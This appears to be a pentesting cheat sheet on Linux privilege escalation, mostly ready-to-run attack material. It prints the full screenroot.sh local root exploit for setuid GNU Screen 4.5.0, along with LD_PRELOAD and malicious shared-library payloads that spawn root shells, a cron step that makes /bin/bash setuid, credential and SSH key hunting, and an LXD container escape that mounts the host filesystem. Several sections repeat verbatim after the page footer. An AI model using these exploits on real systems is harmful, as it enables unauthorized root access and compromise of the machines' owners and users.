Linux Privilege Escalation

Kernel Exploits

Enumeration

# Check Linux OS Versino
uname -a

Exploit if the version is vulnerable

Vulnerable Services (Screen)

# Check Version
screen -v

Exploit Script

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c -Wno-implicit-function-declaration
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

Cron Job Abuse

Enumeration

# Find Write Able Files
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null

https://github.com/DominicBreuker/pspy

Exploitation

# Add 
chmod u+s /bin/bash

Special Permissions

Setuid Bit

# Find Setuid
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

# Find Setgid
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

Path Abuse

PATH is an environment variable that specifies the set of directories where an executable can be located.

# Add Current Directory to Path
PATH=.:${PATH}
export PATH

# Verify Path
echo $PATH

Credentials Hunting

# Enumerate Spool / Mail Directory for Creds
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null

# SSH Keys
ls ~/.ssh

Shared Libraries

# Check Shared Libaries
ldd /bin/ls

# Abuse LD_PRELOAD
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

# Compile
gcc -fPIC -shared -o root.so root.c -nostartfiles

# Run Sudo 
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart

Shared Object Hijacking

# Check Shared Libraries
ldd <bin>

# Check Load Location
readelf -d <bin> | grep PATH


# Malicous Library
#include<stdio.h>
#include<stdlib.h>

void dbquery() {
    printf("Malicious library loaded\n");
    setuid(0);
    system("/bin/sh -p");
} 

# Compile
gcc root.c -fPIC -shared -o /development/libshared.so

Privileged Groups

# Check Group
id

# if LXD is inside the group

# Import Image
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine

# Start Privileged Container
lxc init alpine r00t -c security.privileged=true

# Mount Host 
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true

# Start Container
lxc start r00t

# Get Shell
lxc exec r00t /bin/sh

PreviousSoCat NextWindows Privesc

Last updated 2 months ago

Kernel Exploits

Enumeration

# Check Linux OS Versino
uname -a

Exploit if the version is vulnerable

Vulnerable Services (Screen)

# Check Version
screen -v

Exploit Script

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c -Wno-implicit-function-declaration
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

Shared Libraries

# Check Shared Libaries
ldd /bin/ls

# Abuse LD_PRELOAD
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

# Compile
gcc -fPIC -shared -o root.so root.c -nostartfiles

# Run Sudo 
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart

Shared Object Hijacking

# Check Shared Libraries
ldd <bin>

# Check Load Location
readelf -d <bin> | grep PATH


# Malicous Library
#include<stdio.h>
#include<stdlib.h>

void dbquery() {
    printf("Malicious library loaded\n");
    setuid(0);
    system("/bin/sh -p");
} 

# Compile
gcc root.c -fPIC -shared -o /development/libshared.so

Privileged Groups

# Check Group
id

# if LXD is inside the group

# Import Image
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine

# Start Privileged Container
lxc init alpine r00t -c security.privileged=true

# Mount Host 
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true

# Start Container
lxc start r00t

# Get Shell
lxc exec r00t /bin/sh